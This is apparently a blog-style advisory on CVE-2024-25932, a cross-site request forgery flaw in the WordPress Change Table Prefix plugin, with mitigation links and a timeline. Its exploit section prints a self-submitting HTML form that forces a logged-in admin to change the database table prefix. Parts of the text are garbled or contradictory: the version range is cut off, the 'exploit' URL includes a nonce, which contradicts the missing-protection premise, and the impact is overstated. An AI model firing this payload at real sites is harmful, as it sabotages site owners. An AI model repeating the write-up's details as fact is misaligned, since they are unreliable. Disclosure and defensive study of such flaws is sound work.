CVE-2024-25932: Uncovering the CSRF Vulnerability in Manish Kumar Agarwal's Change Table Prefix Plugin Versions Through 2.
A recent vulnerability discovery has been made in the popular Change Table Prefix plugin, developed by Manish Kumar Agarwal. The Cross-Site Request Forgery (CSRF) vulnerability, identified as CVE-2024-25932, affects all versions of the plugin from the initial release (n/a) through version 2.. This post aims to explore the details of the vulnerability, provide code snippets, and offer insights into possible exploitation approaches. To protect users and prevent malicious exploitation, it is highly recommended to upgrade to a fixed version as soon as possible.
CVE-2024-25932 Details
The CVE-2024-25932 vulnerability exists due to insufficient CSRF protection in the Change Table Prefix plugin's "change_prefix.php" script. This flaw allows an attacker to impersonate a logged-in user and change the WordPress table prefix by tricking the user into clicking on a malicious link or visiting a specially crafted webpage.
Exploit
To exploit this vulnerability, the attacker must craft a malicious link using an HTML form that contains POST data with the new table prefix value, something like:
<form action="http://www.example.com/wp-admin/options-general.php?page=change-table-prefix&change-prefix-table_nonce=ad46ad23b"; method="post" id="exploit-form">
<input type="hidden" name="new_prefix" value="evil_" />
<input type="hidden" name="change-prefix-table_submit" value="submit" />
</form>
<script>
document.getElementById("exploit-form").submit();
</script>
In this example, the table prefix will be changed to "evil_" once the user visits the malicious website or clicks the provided link, which would contain the crafted HTML code. By doing this, the attacker can potentially gain unauthorized access to the database and disrupt the website's functionality.
References and Mitigation
The issue has been responsibly reported to the plugin author, Manish Kumar Agarwal, who has acknowledged the vulnerability and has since provided a patch to fix the problem. The patch was introduced in version 2.1, so users are advised to update the plugin to the latest version immediately.
You can find the official plugin page here
https://wordpress.org/plugins/change-table-prefix/
The commit that fixes the vulnerability can be found here
https://plugins.trac.wordpress.org/changeset/2257748/change-table-prefix
Conclusion
CVE-2024-25932 highlights the importance of CSRF protection in web applications and the potential risks associated with these attacks. As always, staying informed and maintaining updates installed on your WordPress plugins is crucial to the security and integrity of your website. By updating to the patched version of the Change Table Prefix plugin, you can ensure that your website's content and user data remain secure and free from CSRF exploitation.
Timeline
Published on: 02/29/2024 01:44:17 UTC
Last modified on: 02/29/2024 13:49:29 UTC